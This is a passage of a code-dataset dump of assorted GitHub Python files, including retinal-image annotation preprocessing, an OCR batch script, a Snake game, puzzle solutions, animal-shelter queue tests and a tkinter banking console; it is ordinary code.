{}\".format(output_path))\n","repo_name":"tonybeltramelli/pix2code","sub_path":"model/convert_imgs_to_arrays.py","file_name":"convert_imgs_to_arrays.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":11790,"dataset":"github-code","pt":"52"}
{"seq_id":"72478051364","text":"# This script is meant to extend the odir annotations file's diagnostic code\n# fields. The file contains separate keyword annotation for each\n# side, but the code is given for both eyes together so we don't\n# know if, e.g., 'g=1' refers to the left or right.\n# I scanned the file semi-manually and read the help file in order\n# to decipher the annotation code. In addition to the encoded\n# diagnostic keywords, there are exceptions of keywords that\n# indicate the image itself is either not a retina but a whole eye\n# image ('anterior' something...) or that there are two images of\n# the same side (the wrong side has 'no fundus' keyword). 
This\n# script encodes these special cases, for each eye separately,\n# in their own binary fields.\n# The output is a csv file and is printed to stdout for easy piping,\n# unless the --output argument is used.\n### Find All Diagnostic Keywords and Encode Them with:\n# N,D,G,C,A,H,M,O\n# N: normal\n# D: ((non) proliferative) nonproliferative retinopathy\n# G: glaucoma\n# C: catarct\n# A: age related macular degeneration\n# H: hypertensive retinopathy\n# M: myopia\n# O: other diagnoses except 'anterior segment image' and 'no fundus image'\n# special keywords: 'anterior segment image', 'no fundus image'\n\n\nfrom __future__ import print_function, division\nimport os\nimport pandas as pd\nfrom skimage import io, transform\nimport numpy as np\nimport argparse\nimport sys\n\n\n# Command: python3 Preprocessing/decode_diagnostics_keywords.py /home/henrik/PycharmProjects/Project\\ A\\ -\\ VAE\\\n# Retina/odir/ODIR-5K_Training_Annotations\\(Updated\\)_V2.xlsx --out /home/henrik/PycharmProjects/Project\\ A\\ -\\ VAE\\\n# Retina/odir/decoded.csv\n\ninfo_text = \"\"\"Reads the odir\nannotation file and assigns diagnostic codes for each side according\nto the diagnostic keywords. So in addition to fields 'N', 'D' etc.,\nthe script adds fields 'LN','LD','RN','RD' etc.\nIn addition there are fields 'L-ant', 'R-ant' where a non-zero\nindicates there is the special 'anterior segment image' keyword,\nand 'L-no', 'R-no' which indicates the keyword 'no fundus image'.\nDiagnostic keyword code:\nN: normal\nD: ((non) proliferative) nonproliferative retinopathy\nG: glaucoma\nC: catarct\nA: age related macular degeneration\nH: hypertensive retinopathy\nM: myopia\nO: other diagnoses except 'anterior segment image' and 'no fundus image'\nspecial keywords: 'anterior segment image', 'no fundus image'\n\"\"\"\n\ndef decode_d_k(xsl_file, output_file=\"odir/odir_train_lr_annotations.csv\"):\n    #xsl_file = path + \"ODIR-5K_Training_Annotations(Updated)_V2.xlsx\"\n    df = pd.read_excel(xsl_file)\n\n    # get all the unique diagnostics as a list\n    l = df[\"Left-Diagnostic Keywords\"].tolist()\n    l = np.unique(l).tolist()\n    l = \",\".join(l)\n    l = l.split(\",\")\n    l = np.unique(l).tolist()\n    s = \",\".join(l)\n    s.replace(\",\", \"\")\n    np.unique(l)\n    s.split(\",\")\n    x = l[-1]\n    c = x[12] # some weird char that looks like ', '\n    s = s.replace(c, \",\")\n    l = s.split(\",\")\n    l = np.unique(l).tolist() # now l really contains the unique\n\n    # add separate left and right diagnostics columns instead of the\n    # joined one:\n    df[\"LN\"] = np.zeros_like(df[\"N\"])\n    df[\"LD\"] = np.zeros_like(df[\"D\"])\n    df[\"LG\"] = np.zeros_like(df[\"G\"])\n    df[\"LC\"] = np.zeros_like(df[\"C\"])\n    df[\"LA\"] = np.zeros_like(df[\"A\"])\n    df[\"LH\"] = np.zeros_like(df[\"H\"])\n    df[\"LM\"] = np.zeros_like(df[\"M\"])\n    df[\"LO\"] = np.zeros_like(df[\"O\"])\n    df[\"RN\"] = np.zeros_like(df[\"N\"])\n    df[\"RD\"] = np.zeros_like(df[\"D\"])\n    df[\"RG\"] = np.zeros_like(df[\"G\"])\n    df[\"RC\"] = np.zeros_like(df[\"C\"])\n    df[\"RA\"] = np.zeros_like(df[\"A\"])\n    df[\"RH\"] = np.zeros_like(df[\"H\"])\n    df[\"RM\"] = np.zeros_like(df[\"M\"])\n    df[\"RO\"] = np.zeros_like(df[\"O\"])\n    df[\"L-ant\"] = np.zeros_like(df[\"O\"])\n    df[\"L-no\"] = np.zeros_like(df[\"O\"])\n    df[\"R-ant\"] = np.zeros_like(df[\"O\"])\n    df[\"R-no\"] = np.zeros_like(df[\"O\"])\n\n    ### Find All Diagnostic Keywords and Encode Them with:\n    feature = {\n        \"N\": \"normal fundus\",\n        \"D\": \"proliferative retinopathy\",\n        \"G\": \"glaucoma\",\n        \"C\": \"catarct\",\n        \"A\": \"age related macular 
degeneration\",\n        \"H\": \"hypertensive retinopathy\",\n        \"M\": \"myopia\",\n        \"ant\": \"anterior segment\",\n        \"no\": \"no fundus image\",\n    }\n\n    # a function to search pattern in text\n    f = lambda pattern: lambda text: (pattern in text)\n\n    np.vectorize(f(\"normal\"))(df[\"Left-Diagnostic Keywords\"])\n\n    # find features (except 'O') in Left, then Right Eye:\n    for key, val in feature.items():\n        testl = np.vectorize(f(val))(df[\"Left-Diagnostic Keywords\"])\n        testr = np.vectorize(f(val))(df[\"Right-Diagnostic Keywords\"])\n        if key == \"no\":\n            df.loc[testl, \"L-no\"] = 1 # special case 'no fundus'\n            df.loc[testr, \"R-no\"] = 1 # special case 'no fundus'\n        elif key == \"ant\":\n            df.loc[testl, \"L-ant\"] = 1 # special case 'ant'\n            df.loc[testr, \"R-ant\"] = 1 # special case 'ant'\n        else:\n            df.loc[testl, \"L\" + key] = 1\n            df.loc[testr, \"R\" + key] = 1\n\n    # remove feature keywords off the list of diagnostics\n    # so only 'O' Diagnostics remain:\n    olist = l.copy()\n    for w in l:\n        for key, val in feature.items():\n            if val in w:\n                olist.remove(w)\n\n    olist.remove(\"lens dust\")\n    olist.remove(\"optic disk photographically invisible\")\n    olist.remove(\"low image quality\")\n    olist.remove(\"image offset\")\n\n    # Now find the 'O' (=all other) diagnostics:\n    for val in olist:\n        testl = np.vectorize(f(val))(df[\"Left-Diagnostic Keywords\"])\n        testr = np.vectorize(f(val))(df[\"Right-Diagnostic Keywords\"])\n        df.loc[testl, \"LO\"] = 1\n        df.loc[testr, \"RO\"] = 1\n\n    # Making Left and Right each appear in a separate row\n    cols = df.columns.tolist()\n    newcols = [\n        \"ID\",\n        \"Side\",\n        \"Patient Age\",\n        \"Patient Sex\",\n        \"Fundus Image\",\n        \"Diagnostic Keywords\",\n        \"N\",\n        \"D\",\n        \"G\",\n        \"C\",\n        \"A\",\n        \"H\",\n        \"M\",\n        \"O\",\n        \"anterior\",\n        \"no fundus\",\n    ]\n\n    left_df = pd.DataFrame(columns=[\"ID\"])\n    left_df[\"ID\"] = df[\"ID\"]\n    left_df[\"Side\"] = \"L\"\n    left_df[newcols[2:5]] = df[cols[1:4]]\n    left_df[\"Diagnostic Keywords\"] = df[\"Left-Diagnostic Keywords\"]\n    left_df[newcols[6:-2]] = df[cols[15:23]]\n    left_df[newcols[-2:]] = df[[\"L-ant\", \"L-no\"]]\n\n    right_df = pd.DataFrame(columns=[\"ID\"])\n    right_df[\"ID\"] = df[\"ID\"]\n    right_df[\"Side\"] = \"R\"\n    right_df[newcols[2:5]] = df[[cols[i] for i in [1, 2, 4]]]\n    right_df[\"Diagnostic Keywords\"] = df[\"Right-Diagnostic Keywords\"]\n    right_df[newcols[6:-2]] = df[cols[23:-4]]\n    right_df[newcols[-2:]] = df[[\"R-ant\", \"R-no\"]]\n\n    new_df = pd.concat([left_df, right_df], axis=0)\n    new_df = new_df.sort_values(by=[\"ID\", \"Side\"])\n    dirname = os.path.dirname(output_file)\n    os.makedirs(dirname, exist_ok=True)\n    new_df.to_csv(output_file, sep=\"\\t\", index=False, header=True)\n\nif __name__ == \"__main__\":\n    xsl_file = sys.argv[1]\n    output_file = sys.argv[2]\n    decode_d_k(xsl_file=xsl_file, output_file=output_file)\n\n","repo_name":"greggyfromtheblock/vae_for_retinal_images","sub_path":"utils/preprocess_annotations.py","file_name":"preprocess_annotations.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"}
{"seq_id":"30270907625","text":"import sys\nimport os\n\nfrom argparse import ArgumentParser\nfrom argparse import RawDescriptionHelpFormatter\n\n__all__ = []\n__version__ = 0.1\n__date__ = '2015-05-24'\n__updated__ = '2015-05-24'\n\nDEBUG = 1\nTESTRUN = 0\nPROFILE = 0\n\nclass fixParams:\n    def __init__(self, f=None, d=None,s=None,e=None,m=None,o=None):\n        self.fname=f\n        self.direction=d\n        self.startDiff=s\n        self.endDiff=e\n        
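# movieLen stays None unless set by the caller; getParams() below only derives outfname from fname\n        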
self.movieLen=m\n self.outfname=o\n\nclass CLIError(Exception):\n '''Generic exception to raise and log different fatal errors.'''\n def __init__(self, msg):\n super(CLIError).__init__(type(self))\n self.msg = \"E: %s\" % msg\n def __str__(self):\n return self.msg\n def __unicode__(self):\n return self.msg\n\ndef getParams(argv):\n '''Command line options.'''\n\n if argv is None:\n argv = sys.argv\n else:\n sys.argv.extend(argv)\n\n\n #program_version = \"v%s\" % __version__\n #program_build_date = str(__updated__)\n #program_version_message = '%%(prog)s %s (%s)' % (program_version, program_build_date)\n program_shortdesc = 'srtFix' #__import__('__main__').__doc__.split(\"\\n\")[1]\n program_license = '''%s\n\n Created by user_name on %s.\n Copyright 2015 organization_name. All rights reserved.\n\n Licensed under the Apache License 2.0\n http://www.apache.org/licenses/LICENSE-2.0\n\n Distributed on an \"AS IS\" basis without warranties\n or conditions of any kind, either express or implied.\n\nUSAGE\n''' % (program_shortdesc, str(__date__))\n\n # Setup argument parser\n parser = ArgumentParser(description=program_license, formatter_class=RawDescriptionHelpFormatter)\n #parser.add_argument(\"-r\", \"--recursive\", dest=\"recurse\", action=\"store_true\", help=\"recurse into subfolders [default: %(default)s]\")\n #parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", action=\"count\", help=\"set verbosity level [default: %(default)s]\")\n #parser.add_argument(\"-i\", \"--include\", dest=\"include\", help=\"only include paths matching this regex pattern. Note: exclude is given preference over include. [default: %(default)s]\", metavar=\"RE\" )\n #parser.add_argument(\"-e\", \"--exclude\", dest=\"exclude\", help=\"exclude paths matching this regex pattern. [default: %(default)s]\", metavar=\"RE\" )\n #parser.add_argument('-V', '--version', action='version', version=program_version_message)\n #parser.add_argument(dest=\"paths\", help=\"paths to folder(s) with source file(s) [default: %(default)s]\", metavar=\"path\", nargs='+')\n parser.add_argument('direction', choices=['movie-before','movie-after'])\n parser.add_argument('-startDiff', type=float, required=True, \n help='difference at start of movie in seconds, e.g. 2.4')\n parser.add_argument('-endDiff', type=float, \n help='difference at END of movie in seconds, e.g. 
2.4.')\n    parser.add_argument('fileName')\n\n    # Process arguments\n    args = parser.parse_args()\n    # checking the arguments\n    if not os.path.exists(args.fileName):\n        print('%(file)s: file does not exist' % {'file':args.fileName})\n        return None\n    res = fixParams()\n    res.direction = args.direction\n    res.endDiff = args.endDiff\n    res.startDiff = args.startDiff\n    res.fname = args.fileName\n    res.outfname = args.fileName[:-4]+'.fixed'+args.fileName[-4:]\n    return res\n\n\nif __name__ == \"__main__\":\n    pass","repo_name":"ziv17/SRT-tools","sub_path":"srtFix/src/srtFix/getArgs.py","file_name":"getArgs.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"70691285286","text":"from src.model.components.ocr import OCR\nimport json\nimport os\nfrom tqdm import tqdm\n\n# with open('./data/dev_data_ocr.json', 'r', encoding= 'utf8') as f:\n#     data = json.load(f)\n# keys = list(data['annotations'].keys())\n# print(len(keys))\n# entry = data['annotations'][keys[50]]\n# print(entry)\n# image_path = data['images'][str(entry['image_id'])]\n# print(image_path)\n\nocr = OCR()\n# with open(os.path.join('./data', 'vlsp2023_dev_data.json'), 'r', encoding= 'utf8') as f:\n#     data = json.load(f)\n# keys = list(data['annotations'].keys())\n# entry = data['annotations'][keys[136]]\n# print(ocr(os.path.join('./data/', 'dev-images', data['images'][str(entry['image_id'])])))\n\ndef get_tokens(path, map_file, data_dir, predictor, new_file):\n    with open(os.path.join(path, map_file), 'r', encoding= 'utf8') as f:\n        data = json.load(f)\n    keys = list(data['annotations'].keys())\n    for i in tqdm(range(len(keys)), desc= f'Reading {map_file}'):\n        entry = data['annotations'][keys[i]]\n        image_path = data['images'][str(entry['image_id'])]\n        tokens = predictor(os.path.join(path, data_dir, image_path))\n        tokens = ' '.join(tokens) if len(tokens) > 0 else ''\n        entry['ocr'] = tokens\n    with open(os.path.join(path, new_file), 'w', encoding= 'utf8') as f:\n        json.dump(data, f, indent= 4)\n\nget_tokens('./data', 'vlsp2023_dev_data.json', 'dev-images', ocr, 'dev_data_ocr.json')\nget_tokens('./data', 'vlsp2023_test_data.json', 'test-images', ocr, 'test_data_ocr.json')\nget_tokens('./data', 'vlsp2023_train_data.json', 'training-images', ocr, 'train_data_ocr.json')\n    ","repo_name":"suracI-invert/vlsp-vqa","sub_path":"ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"41298024535","text":"# Snake game using the PyGame library for python\n#\n# By Ryan C. 
McDermott\n\nimport pygame\nimport time\nfrom random import randrange\npygame.init()\nfrom spritesheet import SpriteSheet\n\nSNAKE_WIDTH = 24\nSNAKE_HEIGHT = 24\nW_MULT = 32\nH_MULT = 24\nHEIGHT_BORDER = H_MULT*SNAKE_HEIGHT\nWIDTH, HEIGHT = W_MULT*SNAKE_WIDTH, HEIGHT_BORDER + (4 * SNAKE_HEIGHT)\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Snake v1.0\")\nBACKGROUND = (50, 50, 50)\nSNAKE_COLOUR = (0, 255, 0)\nFRUIT_COLOUR = (255, 0, 0)\nBORDER_COLOUR = (0, 0, 255)\nGAME_FONT = pygame.font.SysFont('Times New Roman', 30)\nFPS = 15\n\nsprite_sheet = pygame.image.load(\"assets/Textures.png\").convert_alpha()\nLOSE_SCREEN = pygame.image.load(\"assets/LoseScreen.png\").convert_alpha()\nLOSE_SCREEN = pygame.transform.scale(LOSE_SCREEN, (WIDTH, HEIGHT))\n\nborder_line = pygame.Rect(0, HEIGHT_BORDER, WIDTH, SNAKE_HEIGHT // 2)\n\nsnake = pygame.Rect((WIDTH // 2) - SNAKE_WIDTH,\n (HEIGHT_BORDER // 2),\n SNAKE_WIDTH,\n SNAKE_HEIGHT)\nsnake_change_x = 0\nsnake_change_y = 0\n\nfruit_x = randrange(1, W_MULT) * SNAKE_WIDTH\nfruit_y = randrange(1, H_MULT) * SNAKE_HEIGHT\nfruit = pygame.Rect(fruit_x, fruit_y, SNAKE_WIDTH, SNAKE_HEIGHT)\n\ndef draw_game(snake, fruit, snake_body, score):\n WIN.fill(BACKGROUND)\n pygame.draw.rect(WIN, BORDER_COLOUR, (border_line.x, border_line.y, WIDTH, SNAKE_HEIGHT // 2))\n snake_head = SpriteSheet(sprite_sheet, 384, 384, 2, 0).get_image(8)\n\n text_surface = GAME_FONT.render(f\"Score: {score}\", True, BORDER_COLOUR)\n WIN.blit(text_surface, (40, HEIGHT_BORDER + 40))\n\n if len(snake_body) == 1:\n pygame.draw.rect(WIN, SNAKE_COLOUR, (snake.x, snake.y, SNAKE_WIDTH, SNAKE_HEIGHT))\n else:\n for i in range(len(snake_body)):\n pygame.draw.rect(WIN, SNAKE_COLOUR, (snake_body[i][0], snake_body[i][1], SNAKE_WIDTH, SNAKE_HEIGHT))\n\n pygame.draw.rect(WIN, FRUIT_COLOUR, (fruit.x, fruit.y, SNAKE_WIDTH, SNAKE_HEIGHT))\n # WIN.blit(snake_head, (snake.x, snake.y))\n pygame.display.update()\n\ndef snake_move(snake, key, snake_body):\n global snake_change_x\n global snake_change_y\n if (key[pygame.K_LEFT] and snake.x > 0 and\n (snake.x - SNAKE_WIDTH) not in [snake_list[0] for snake_list in snake_body]):\n snake_change_x = - SNAKE_WIDTH\n snake_change_y = 0\n if (key[pygame.K_RIGHT] and snake.x < WIDTH - SNAKE_WIDTH and\n (snake.x + SNAKE_WIDTH) not in [snake_list[0] for snake_list in snake_body]):\n snake_change_x = SNAKE_WIDTH\n snake_change_y = 0\n if (key[pygame.K_UP] and snake.y > 0 and\n (snake.y - SNAKE_WIDTH) not in [snake_list[1] for snake_list in snake_body]):\n snake_change_y = - SNAKE_HEIGHT\n snake_change_x = 0\n if (key[pygame.K_DOWN] and snake.y < HEIGHT_BORDER - SNAKE_HEIGHT and\n (snake.y + SNAKE_WIDTH) not in [snake_list[1] for snake_list in snake_body]):\n snake_change_y = SNAKE_HEIGHT\n snake_change_x = 0\n\n\ndef main():\n score = 0\n snake_length = 1\n snake_body = []\n clock = pygame.time.Clock()\n run = True\n while run:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n key = pygame.key.get_pressed()\n snake_move(snake, key, snake_body)\n snake.x += snake_change_x\n snake.y += snake_change_y\n snake_body.append([snake.x, snake.y])\n if len(snake_body) > snake_length:\n del snake_body[0]\n\n if (fruit.x, fruit.y) == (snake.x, snake.y):\n fruit.x = randrange(1, W_MULT) * SNAKE_WIDTH\n fruit.y = randrange(1, H_MULT) * SNAKE_HEIGHT\n snake_length += 1\n score += 1\n\n draw_game(snake, fruit, snake_body, score)\n\n\n if snake.x < 0 or snake.x > (WIDTH - SNAKE_WIDTH):\n run = False\n 
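# Left/right wall collision: show the lose screen for three seconds before quitting.\n            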
WIN.blit(LOSE_SCREEN, (0, 0))\n            pygame.display.update()\n            time.sleep(3)\n\n\n        if snake.y < 0 or snake.y > (HEIGHT_BORDER - SNAKE_HEIGHT):\n            run = False\n            WIN.blit(LOSE_SCREEN, (0, 0))\n            pygame.display.update()\n            time.sleep(3)\n\n\n    pygame.quit()\n\nif __name__ == '__main__':\n    main()","repo_name":"R-C-McDermott/PyGame-Snake","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"18538034155","text":"# 파일 합치기 3 G4\n# 1. 파일들 중에서 제일 작은 두개를 뽑는다.\n# 2. 합친다\n# 3. 합친걸 다시 파일들에 둔다.\n# 우선순위큐를 이용해서 항상 작은 값들이 앞으로 가게 함\nimport heapq\nimport sys\n\ninput = sys.stdin.readline\nt = int(input())\nfor _ in range(t):\n    n = int(input())\n    arr = list(map(int, input().split()))\n    file = []\n    for i in arr:\n        heapq.heappush(file, i)\n    result = 0\n    while len(file) > 1:\n        a = heapq.heappop(file)\n        b = heapq.heappop(file)\n        result += a + b\n        heapq.heappush(file, a + b)\n\n    print(result)\n","repo_name":"kkm0406/AlgorithmBOJ","sub_path":"그리디/13975.py","file_name":"13975.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"26351548041","text":"##Status: Solved\n##Problem: If the numbers 1 to 5 are written out in words: one, two, three, four, five, then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.\n##\n##If all the numbers from 1 to 1000 (one thousand) inclusive were written out in words, how many letters would be used?\n##\n##\n##NOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-two) contains 23 letters and 115 (one hundred and fifteen) contains 20 letters. The use of \"and\" when writing out numbers is in compliance with British usage.\n\nnumbermap = [0,3,3,5,4,4,3,5,5,4] #This is a map from our base numbers to the amount of letters used\nhundred = 7\nthousand = 8\nund = 3\nteens = [3,3,3,3,4,3,4,4,3,4] #additional letters relative to its single digit place\ntens = [0,\"blank\",6,6,5,5,5,7,6,6] #tens 20, 30,....\n\ncount = 0\n\nfor i in range(1,1001): #This for loop will go through each number\n    strnum = str(i)\n    count+=numbermap[int(strnum[len(strnum)-1])] #for said number, it'll count the letters used for the singles digit place\n    if i >9: #for any number beyond 9, it'll take into consideration the tens digit place using the teens as a special case ruling relative to the others\n        if int(strnum[len(strnum)-2]) == 1:\n            count+=teens[int(strnum[len(strnum)-1])]\n        else:\n            count+=tens[int(strnum[len(strnum)-2])]\n    if i > 99: #this will consider the hundreds digit place making rules about when to add 'hundred' and 'and'\n        count+=numbermap[int(strnum[len(strnum)-3])]\n        if i%1000 !=0:\n            count+= hundred\n        if i%100 != 0:\n            count+=und\n    if i > 999:\n        count+=numbermap[int(strnum[len(strnum)-4])]\n        count+= thousand\nprint(count)\n","repo_name":"himynameisfil-website-challenges/Project-Euler-dot-com","sub_path":"problem017.py","file_name":"problem017.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"21211092359","text":"'''\nRequired Tests:\n- [x] “Happy Path” - Expected outcome\n- [x] Expected failure\n- [x] Edge Case (if applicable/obvious)\n'''\n\nimport pytest\n\nfrom code_challenges.fifo_animal_shelter.fifo_animal_shelter import Cat, Dog, Animal, AnimalShelter\nfrom stacks_and_queues.stacks_and_queues import Queue, InvalidOperationError\n\n# py
+{"seq_id":"26351548041","text":"##Status: Solved\n##Problem: If the numbers 1 to 5 are written out in words: one, two, three, four, five, then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.\n##\n##If all the numbers from 1 to 1000 (one thousand) inclusive were written out in words, how many letters would be used?\n##\n##\n##NOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-two) contains 23 letters and 115 (one hundred and fifteen) contains 20 letters. The use of \"and\" when writing out numbers is in compliance with British usage.\n\nnumbermap = [0,3,3,5,4,4,3,5,5,4] #This is a map from our base numbers to the amount of letters used\nhundred = 7\nthousand = 8\nund = 3\nteens = [3,3,3,3,4,3,4,4,3,4] #additional letters relative to its single digit place\ntens = [0,\"blank\",6,6,5,5,5,7,6,6] #tens 20, 30,....\n\ncount = 0\n\nfor i in range(1,1001): #This for loop will go through each number\n    strnum = str(i)\n    count+=numbermap[int(strnum[len(strnum)-1])] #for said number, it'll count the letters used for the ones digit place\n    if i >9: #for any number beyond 9, it'll take into consideration the tens digit place, using the teens as a special-case ruling relative to the others\n        if int(strnum[len(strnum)-2]) == 1:\n            count+=teens[int(strnum[len(strnum)-1])]\n        else:\n            count+=tens[int(strnum[len(strnum)-2])]\n    if i > 99: #this will consider the hundreds digit place, with rules about when to add 'hundred' and 'and'\n        count+=numbermap[int(strnum[len(strnum)-3])]\n        if i%1000 !=0:\n            count+= hundred\n        if i%100 != 0:\n            count+=und\n    if i > 999:\n        count+=numbermap[int(strnum[len(strnum)-4])]\n        count+= thousand\nprint(count)\n","repo_name":"himynameisfil-website-challenges/Project-Euler-dot-com","sub_path":"problem017.py","file_name":"problem017.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"21211092359","text":"'''\nRequired Tests:\n- [x] “Happy Path” - Expected outcome\n- [x] Expected failure\n- [x] Edge Case (if applicable/obvious)\n'''\n\nimport pytest\n\nfrom code_challenges.fifo_animal_shelter.fifo_animal_shelter import Cat, Dog, Animal, AnimalShelter\nfrom stacks_and_queues.stacks_and_queues import Queue, InvalidOperationError\n\n# pyproject.toml lives here; that is the root directory.\n\ndef test_connection():\n    return AnimalShelter()\n\ndef test_animal_is_cute():\n    animal = Animal()\n    actual = animal.trait\n    expected = \"cute\"\n    assert actual == expected\n\ndef test_make_a_cat():\n    cat = Cat()\n    actual = type(cat)\n    expected = Cat\n    assert actual == expected\n\ndef test_dog_is_cute():\n    dog = Dog()\n    actual = dog.trait\n    expected = \"cute\"\n    assert actual == expected\n\ndef test_name():\n    dog = Dog(\"Fido\")\n    actual = dog.name\n    expected = \"Fido\"\n    assert actual == expected\n\ndef test_enqueue_cat():\n    cat = Cat(\"Felix\")\n    shelter = AnimalShelter()\n    shelter.enqueue(cat)\n    actual = shelter.cat_queue.peek().name\n    expected = \"Felix\"\n    assert actual == expected\n\ndef test_enqueue_dog():\n    dog = Dog(\"Spot\")\n    shelter = AnimalShelter()\n    shelter.enqueue(dog)\n    actual = shelter.dog_queue.peek().name\n    expected = \"Spot\"\n    assert actual == expected\n\ndef test_request_cat():\n    cat = Cat(\"Felix\")\n    shelter = AnimalShelter()\n    shelter.enqueue(cat)\n    actual = shelter.dequeue(\"cat\").name\n    expected = \"Felix\"\n    assert actual == expected\n\ndef test_request_cat_line_of_two():\n    cat = Cat(\"Felix\")\n    cat2 = Cat(\"Garfield\")\n    shelter = AnimalShelter()\n    shelter.enqueue(cat)\n    shelter.enqueue(cat2)\n    actual = shelter.dequeue(\"cat\").name\n    expected = \"Felix\"\n    assert actual == expected\n\ndef test_request_cat_line_of_two_second():\n    cat = Cat(\"Felix\")\n    cat2 = Cat(\"Garfield\")\n    shelter = AnimalShelter()\n    shelter.enqueue(cat)\n    shelter.enqueue(cat2)\n    shelter.dequeue(\"cat\")\n    actual = shelter.dequeue(\"cat\").name\n    expected = \"Garfield\"\n    assert actual == expected\n\ndef test_request_dog_line_of_two():\n    dog = Dog(\"Spot\")\n    dog2 = Dog(\"Clifford\")\n    shelter = AnimalShelter()\n    shelter.enqueue(dog)\n    shelter.enqueue(dog2)\n    actual = shelter.dequeue(\"dog\").name\n    expected = \"Spot\"\n    assert actual == expected\n\ndef test_request_snake():\n    cat = Cat(\"Felix\")\n    shelter = AnimalShelter()\n    shelter.enqueue(cat)\n    actual = shelter.dequeue(\"snake\")\n    expected = None\n    assert actual == expected\n\ndef test_request_dog_empty():\n    dog = Dog(\"Spot\")\n    dog2 = Dog(\"Clifford\")\n    shelter = AnimalShelter()\n    shelter.enqueue(dog)\n    shelter.enqueue(dog2)\n    shelter.dequeue(\"dog\")\n    shelter.dequeue(\"dog\")\n    #context manager (aka bubble) to raise errors in to test them; otherwise seen as legit error. 
Thanks Skyler!\n with pytest.raises(InvalidOperationError):\n shelter.dequeue(\"dog\")\n\ndef test_animal_id_counter_cat():\n dog = Dog(\"Spot\")\n dog2 = Dog(\"Clifford\")\n cat = Cat(\"Felix\")\n cat2 = Cat(\"Garfield\")\n shelter = AnimalShelter()\n shelter.enqueue(dog)\n shelter.enqueue(dog2)\n shelter.enqueue(cat)\n shelter.enqueue(cat2)\n actual = shelter.cat_queue.peek().animal_id\n expected = 3\n assert actual == expected\n\ndef test_animal_id_counter_dog():\n dog = Dog(\"Spot\")\n dog2 = Dog(\"Clifford\")\n cat = Cat(\"Felix\")\n cat2 = Cat(\"Garfield\")\n shelter = AnimalShelter()\n shelter.enqueue(dog)\n shelter.enqueue(dog2)\n shelter.enqueue(cat)\n shelter.enqueue(cat2)\n actual = shelter.dog_queue.peek().animal_id\n expected = 1\n assert actual == expected\n\ndef test_waiting_longer_animal():\n dog = Dog(\"Spot\")\n dog2 = Dog(\"Clifford\")\n cat = Cat(\"Felix\")\n cat2 = Cat(\"Garfield\")\n shelter = AnimalShelter()\n shelter.enqueue(dog)\n shelter.enqueue(dog2)\n shelter.enqueue(cat)\n shelter.enqueue(cat2)\n new_pet = shelter.dequeue()\n actual = type(new_pet)\n expected = Dog\n assert actual == expected\n","repo_name":"paul-leonard/data-structures-and-algorithms","sub_path":"python/tests/test_fifo_animal_shelter.py","file_name":"test_fifo_animal_shelter.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"47808491658","text":"from tkinter import *\n\ncurrent_state = [{'name': \"Ivanov\", 'account': 70155120}]\n\nwidth_val = 640\nheight_val = 480\n\nGUI = Tk()\nGUI.geometry(\"{0}x{1}\".format(width_val, height_val))\nGUI.title(\"Задание 2\")\n\ncommand_line = StringVar()\n\nmain_frame = Frame()\nmain_frame.pack()\n\nfirst_frame = Frame(main_frame)\nfirst_frame.pack(side=LEFT)\n\nsecond_frame = Frame(main_frame)\nsecond_frame.pack()\n\n\ndef key(event):\n print(\"pressed\", repr(event.char))\n s = command_console.get(1.0, END)\n startCommand(s)\n\n\ndef deposit(name, value):\n client = False\n this_string = \"\"\n for i in range(len(current_state)):\n if current_state[i]['name'] == name:\n current_account = int(current_state[i]['account'])\n current_account += int(value)\n current_state[i]['account'] = str(current_account)\n this_string += \"DEPOSIT: {1} to {0}\".format(name, value)\n print(\"DEPOSIT: {1} to {0}\".format(name, value))\n client = True\n if not client:\n current_state.append({'name': name, 'account': value})\n this_string += \"CREATE: {0} \\n DEPOSIT: {1} to {0}\".format(name, value)\n print(\"CREATE: {0} \\n DEPOSIT: {1} to {0}\".format(name, value))\n\n this_string += \"\\n\"\n return this_string\n\n\ndef withdraw(name, value):\n this_string = \"\"\n client = False\n for i in range(len(current_state)):\n if current_state[i]['name'] == name:\n current_account = int(current_state[i]['account'])\n current_account -= int(value)\n current_state[i]['account'] = str(current_account)\n this_string += \"WITHDRAW: {1} from {0}\".format(name, value)\n print(\"WITHDRAW: {1} from {0}\".format(name, value))\n client = True\n if not client:\n current_state.append({'name': name, 'account': (int(value) * (-1))})\n this_string += \"CREATE: {0} \\n WITHDRAW: {1} to {0}\".format(name, value)\n print(\"CREATE: {0} \\n WITHDRAW: {1} from {0}\".format(name, value))\n\n this_string += \"\\n\"\n return this_string\n\n\ndef balance(name):\n this_string = \"\"\n client = False\n for i in range(len(current_state)):\n if current_state[i]['name'] == name:\n this_string += \"BALANCE: 
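The shelter tests above also pin down a no-preference dequeue (test_waiting_longer_animal adopts out whichever species has waited longest). The class under test is not included in this file; below is a sketch consistent with those tests — the two queues, the incrementing animal_id, and the front-of-queue comparison are all inferred from the assertions, and Queue's enqueue/dequeue/peek/is_empty API is an assumption:

```python
class AnimalShelter:
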